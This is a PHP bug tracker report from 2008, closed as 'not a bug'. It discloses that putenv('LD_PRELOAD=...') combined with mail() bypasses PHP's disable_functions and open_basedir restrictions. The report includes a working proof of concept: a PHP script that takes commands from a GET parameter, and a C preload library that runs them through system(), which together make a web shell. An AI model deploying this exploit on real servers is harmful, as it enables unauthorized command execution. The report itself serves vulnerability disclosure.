php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #46741 putenv()+mail() allows for open_basedir bypass and "disabled" functionality
Submitted: 2008-12-03 16:43 UTC Modified: 2008-12-08 11:59 UTC
Votes:1
Avg. Score:3.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: gat3way at gat3way dot eu Assigned:
Status: Not a bug Package: Safe Mode/open_basedir
PHP Version: 5.2.6 OS: Linux
Private report: No CVE-ID: None
 [2008-12-03 16:43 UTC] gat3way at gat3way dot eu
Description:
------------
safe_mode is safe, but the mail() function should check environment variables IMO.

e.g. you can putenv("LD_PRELOAD=evil_library.so"); and since mail() calls /usr/bin/mail if your library exports function like getuid() you can bypass open_basedir restrictions and restrictions on program execution, etc.

If you need some more info, please contact me at:

gat3way@gat3way.eu

Milen Rangelov

Reproduce code:
---------------
A PHP script:
<?php
putenv("LD_PRELOAD=/var/www/a.so");
$a=fopen("/var/www/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);
mail("a","a","a","a");
$a=fopen("/var/www/.comm1","r");
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a); ?>

A simple library:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int getuid()
{
char *en;
char *buf=malloc(300);
FILE *a;

unsetenv("LD_PRELOAD");
a=fopen("/var/www/.comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a); remove("/var/www/.comm");
rename("/var/www/a.so","/var/www/b.so");
buf=strcat(buf," > /var/www/.comm1");
system(buf);
rename("/var/www/b.so","/var/www/a.so");
free(buf);return 0;
}



Expected result:
----------------
execute arbitrary commands even though we have:

disable_functions = dl,system,exec,passthru,shell_exec,popen
open_basedir = /var/www

Actual result:
--------------
The test was successful.

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2008-12-08 11:59 UTC] jani@php.net
You should disable putenv() as well.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Mon Nov 25 15:01:32 2024 UTC